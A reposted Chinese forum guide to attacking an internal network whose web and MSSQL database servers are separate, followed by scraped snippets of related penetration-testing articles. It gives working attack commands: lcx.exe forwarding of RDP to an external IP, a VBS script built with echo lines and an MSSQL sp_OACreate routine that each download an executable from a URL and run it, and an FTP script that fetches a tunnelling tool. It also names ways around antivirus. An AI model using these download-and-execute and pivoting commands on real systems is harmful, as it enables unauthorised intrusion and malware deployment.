MSSQL站库分离情况的渗透思路

本文转自:http://bbs.blackbap.org/thread-6203-1-2.html

1. 服务器属内网环境,站库分离,通过web.config找到数据库服务库SA帐号密码,成功添加用户(192.168.0.206) 。
2.
Web服务器(192.168.0.203) 、数据库服务器(192.168.0.206)都存在symantec杀毒软件,不能转lcx.exe工具转发

3. 测试过其它的转发工具,要么被查杀,要么无法用,使用reDuh工具只能转发当前IP的,而且速度极慢,受不了0.0 。
4.
使用msfpayload生成的exe文件也被查杀,由于服务器是x64的,msfencode没有x64的编码器,所以没能反弹成功

思路1:关闭杀软,通过以下提供的命令下载文件(未测试)
思路2:使用msf
aspx反弹,然后进行转发及跨路由渗透(已成功)

正常思路:如果没有杀软,直接传lcx.exe到192.168.0.203上,然后使用以下命令转发192.168.0.206:
c:\lcx.exe
-slave 你的外网IP 51 192.168.0.206 3389                // 看了这个后,你们应该都懂的吧 0.0

DOS命令:(一条一条执行)

  1. echo Set Post = CreateObject("Msxml2.XMLHTTP") >>xxx.vbs
  2. echo Set Shell = CreateObject("Wscript.Shell") >>xxx.vbs
  3. echo Post.Open "GET","http://bbs.blackbap.org/payload.exe",0
    >>xxx.vbs
  4. echo Post.Send() >>xxx.vbs
  5. echo Set aGet = CreateObject("ADODB.Stream") >>xxxc.vbs
  6. echo aGet.Mode = 3 >>xxx.vbs
  7. echo aGet.Type = 1 >>xxx.vbs
  8. echo aGet.Open() >>xxx.vbs
  9. echo aGet.Write(Post.responseBody) >>xxx.vbs
  10. echo aGet.SaveToFile "c:\xxxc.exe",2 >>xxx.vbs
  11. echo wscript.sleep 1000 >>xxxc.vbs
  12. echo Shell.Run ("c:\xxx.exe") >>xxx.vbs

复制代码

  1. echo open 127.0.0.1>c:\ftp.dat
  2. echo admin>>c:\ftp.dat
  3. echo admin>>c:\ftp.dat
  4. echo binary>>c:\ftp.dat
  5. echo get lcx.exe>>c:\ftp.dat
  6. echo bye>>c:\ftp.dat
  7. ftp -s:c:\ftp.dat

复制代码

MSSQL 命令:

  1. DECLARE @js int
  2. EXEC sp_OACreate ‘ScriptControl‘,@js OUT
  3. EXEC sp_OASetProperty @js, ‘Language‘, ‘JavaScript1.1‘
  4. EXEC sp_OAMethod @js, ‘Eval‘, NULL, ‘var x = new
    ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "Url",0);x.Send();var s = new
    ActiveXObject("ADODB.Stream");s.Mode = 3;s.Type =
    1;s.Open();s.Write(x.responseBody);s.SaveToFile("C:\\windows\\自己设置保存的EXE文件名.exe",2);var
    r = new
    ActiveXObject("WScript.Shell");r.Run("C:\\windows\\自己设置保存的EXE文件名.exe");‘

复制代码

  1. declare @o int, @f int, @t int, @ret int
  2. exec sp_oacreate ‘scripting.filesystemobject‘, @o out
  3. exec sp_oamethod @o, ‘createtextfile‘, @f out, ‘C:\1.bat‘, 1
  4. exec @ret = sp_oamethod @f, ‘writeline‘, NULL,‘open IP‘
  5. exec @ret = sp_oamethod @f, ‘writeline‘, NULL,‘ftp账号‘
  6. exec @ret = sp_oamethod @f, ‘writeline‘, NULL,‘ftp密码‘
  7. exec @ret = sp_oamethod @f, ‘writeline‘, NULL,‘get lcx.exe‘
  8. exec @ret = sp_oamethod @f, ‘writeline‘, NULL,‘bye‘
时间: 2024-10-09 10:42:23

MSSQL站库分离情况的渗透思路的相关文章

站库分离拿内网服务器到拿下目标服务器

0x00 提权环境这是一机油来问我如何脱裤~~~然后就试试提权看了下端口,就开了80和3389Windows 2003 x86既然脱裤,就可想而知肯定有数据库由图可知该例是站库分离,当时我还傻乎乎的拿着sa去执行添加用户命令结果连不上~~~肯定连不上撒!!!好吧,思路有以下几条:一.              不管这配置文件,直接在原服务器上进行提权二.              先利用sa拿下内网服务器然后再拿下原服务器首先试试第一条~~ 0x01 原服务器上提权无常用的第三方软件,只有从溢出

简单lamp动静、站库分离搭建过程

环境:三台主机,一台win机器(访问测试用) 1.192.168.10.80:安装阿帕奇.httpd 2.192.168.10.81:安装php组件.php-fpm.php-mysql 3.192.168.80.82:安装数据库.mariadb rpm安装也好,yum安装也好,编译安装也可. 安装: 三台机器分别yum安装服务 1.yum -y install httpd 2.yum -y install php-fpm php-mysql 3.yum -y install mariadb 设置

站库分离-命令行下载文件

全部使用系统默认 第三方或者脚本不去讨论 window Bitsadmin: bitsadmin /transfer n [url]http://baidu.com/up.exe[/url] %temp%\up.exe ftp: echo open 127.0.0.1 > o&echo user 123 123123123 >> o &echo get s.exe >> o &echo quit >> o &ftp -n -s:o

站库分离 数据库不能联网 脱大型库

自己-web-sqlserver(15G 不能联网) 1.web-ipc->sqlserver 2.sqlserver->ipc-web 3.写脚本查询 切片 4.提权web服务器 去连接sqlserver

网站渗透思路全方面总结 (详细篇)

针对新手写一点渗透的小思路.小技巧,主要讲的是思路,所有不会太详细. 经常逛一些好的博客或者门户站,坚持下来,每天学一点思路,你会积累到很多东西,记住:技术需要时间沉淀. (一)针对网站程序,不考虑服务器. 一.查找注入,注意数据库用户权限和站库是否同服. 二.查找XSS,最近盲打很流行,不管怎样我们的目的是进入后台. 三.查找上传,一些能上传的页面,比如申请友链.会员头像.和一些敏感页面等等,注意查看验证方式是否能绕过,注意结合服务器的解析特性,比如典型的IIS6.0.阿帕奇等. 四.查找编辑

网站渗透思路(转自红黑联盟)

针对新手写一点渗透的小思路.小技巧,主要讲的是思路,所有不会太详细. 经常逛一些好的博客或者门户站,坚持下来,每天学一点思路,你会积累到很多东西,记住:技术需要时间沉淀. (一)针对网站程序,不考虑服务器. 一.查找注入,注意数据库用户权限和站库是否同服. 二.查找XSS,最近盲打很流行,不管怎样我们的目的是进入后台. 三.查找上传,一些能上传的页面,比如申请友链.会员头像.和一些敏感页面等等,注意查看验证方式是否能绕过,注意结合服务器的解析特性,比如典型的IIS6.0.阿帕奇等. 四.查找编辑

网站渗透思路

开始找工作了,先总结一点渗透的手段,面试的时候可能用的着,我始终坚信机会是留给有准备的人的,多一份努力,就多一份机遇.稍微写一点渗透的小思路.小技巧,主要讲的是思路,所有不会太详细. 注意经常逛一些好的博客或者门户站,坚持下来,每天学一点思路,你会积累到很多东西,记住:技术需要时间沉淀. (一)针对网站程序,不考虑服务器. 一.查找注入,注意数据库用户权限和站库是否同服. 二.查找XSS,最近盲打很流行,不管怎样我们的目的是进入后台. 三.查找上传,一些能上传的页面,比如申请友链.会员头像.和一

网站渗透思路全方面总结

针对新手写一点渗透的小思路.小技巧,主要讲的是思路,所有不会太详细. 经常逛一些好的博客或者门户站,坚持下来,每天学一点思路,你会积累到很多东西,记住:技术需要时间沉淀. (一)针对网站程序,不考虑服务器. 一.查找注入,注意数据库用户权限和站库是否同服. 二.查找XSS,最近盲打很流行,不管怎样我们的目的是进入后台. 三.查找上传,一些能上传的页面,比如申请友链.会员头像.和一些敏感页面等等,注意查看验证方式是否能绕过,注意结合服务器的解析特性,比如典型的IIS6.0.阿帕奇等. 四.查找编辑

内网渗透思路

Sky's自留地 关注互联网安全,关注安全&攻击技术. 搜索关键字搜索 首页申请链接 内网渗透测试思路[转自网络] 作者: sky 孵化于: March 15, 2015 家属: 学习类,技术类 访问: 2,136 次 写在前面渗透测试是门技术,也是一门艺术.这门技术(艺术)一开始也不是每个人都会的,正所谓没有人一出生就会走路,从不懂到入门到深谙,一步步慢慢来,每个人都是这样:但是在这个过程中,思路无疑是最重要的,没有做不到只有想不到,就跟咱们高中解题时有了思路就迎刃而解一样,手里拿着铲子(技巧